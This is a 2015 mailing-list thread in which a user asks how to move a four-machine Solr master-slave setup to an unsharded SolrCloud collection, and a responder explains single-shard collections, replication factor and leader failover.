Hello, We are trying to move away from Master-Slave configuration to a SolrCloud environment. I have a couple of questions. Currently in the Master-Slave setup we have 4 Machines 2 of which are indexers and 2 of them are query servers. The query servers are fronted via Load Balancer. There are 3 solr cores for 3 different/separate applications (mutually exclusive). Each core is a complete index of all docs (i.e. the data is not sharded). We intend to keep it in a non-sharded mode even after the SolrCloud mode.The prime motivation to move to cloud is to effectively use all servers for indexing and querying (read fault tolerant/redundant). So, the real question is, can SolrCloud be used without shards ? i.e. a "collection" resides entirely on one machine rather than partitioning data onto different machines ? Thanks Ravi Kiran Bhaskar
Re: SolrCloud clarification/Question
OK...I understood numShards=1, when you say replicationFactor=2 what does it mean ? I have 4 machines, then, only 3 copies of data (1 at leader and 2 replicas) ?? so am i not under utilizing one machine ? I was more thinking in the lines of a Mesh connectivity format i.e. everybody has others copy so that I can put all 4 machines behind a Load Balancer...Is that a wrong way to look at it ? Thanks Ravi Kiran On Wed, Sep 16, 2015 at 2:51 PM, Sameer Maggon <sam...@measuredsearch.com> wrote: > You'll have to say numShards=1 and replicationFactor=2. > > http:// > > [hostname]:8983/solr/admin/collections?action=CREATE=test=test=1=2 > > On Wed, Sep 16, 2015 at 11:23 AM, Ravi Solr <ravis...@gmail.com> wrote: > > > Thank you very much for responding Sameer so numShards=0 and > > replicationFactr=4 if I have 4 machines ?? > > > > Thanks > > > > Ravi Kiran Bhaskar > > > > On Wed, Sep 16, 2015 at 12:56 PM, Sameer Maggon < > sam...@measuredsearch.com > > > > > wrote: > > > > > Absolutely. You can have a collection with just replicas and no shards > > for > > > redundancy and have a load balancer in front of it that removes the > > > dependency on a single node. One of them will assume the role of a > > leader, > > > and in case that leader goes down, one of the replicas will be elected > > as a > > > leader and your application will be fine. > > > > > > Thanks, > > > > > > On Wed, Sep 16, 2015 at 9:44 AM, Ravi Solr <ravis...@gmail.com> wrote: > > > > > > > Hello, > > > > We are trying to move away from Master-Slave configuration > to > > a > > > > SolrCloud environment. I have a couple of questions. Currently in the > > > > Master-Slave setup we have 4 Machines 2 of which are indexers and 2 > of > > > them > > > > are query servers. The query servers are fronted via Load Balancer. > > > > > > > > There are 3 solr cores for 3 different/separate applications > (mutually > > > > exclusive). Each core is a complete index of all docs (i.e. the data > is > > > not > > > > sharded). > > > > > > > > We intend to keep it in a non-sharded mode even after the > > SolrCloud > > > > mode.The prime motivation to move to cloud is to effectively use all > > > > servers for indexing and querying (read fault tolerant/redundant). > > > > > > > > So, the real question is, can SolrCloud be used without shards ? > i.e. a > > > > "collection" resides entirely on one machine rather than partitioning > > > data > > > > onto different machines ? > > > > > > > > Thanks > > > > > > > > Ravi Kiran Bhaskar > > > > > > > > > > > > > > > > -- > > > *Sameer Maggon* > > > Measured Search > > > c: 310.344.7266 > > > www.measuredsearch.com <http://measuredsearch.com> > > > > > > > > > -- > *Sameer Maggon* > Measured Search > c: 310.344.7266 > www.measuredsearch.com <http://measuredsearch.com> >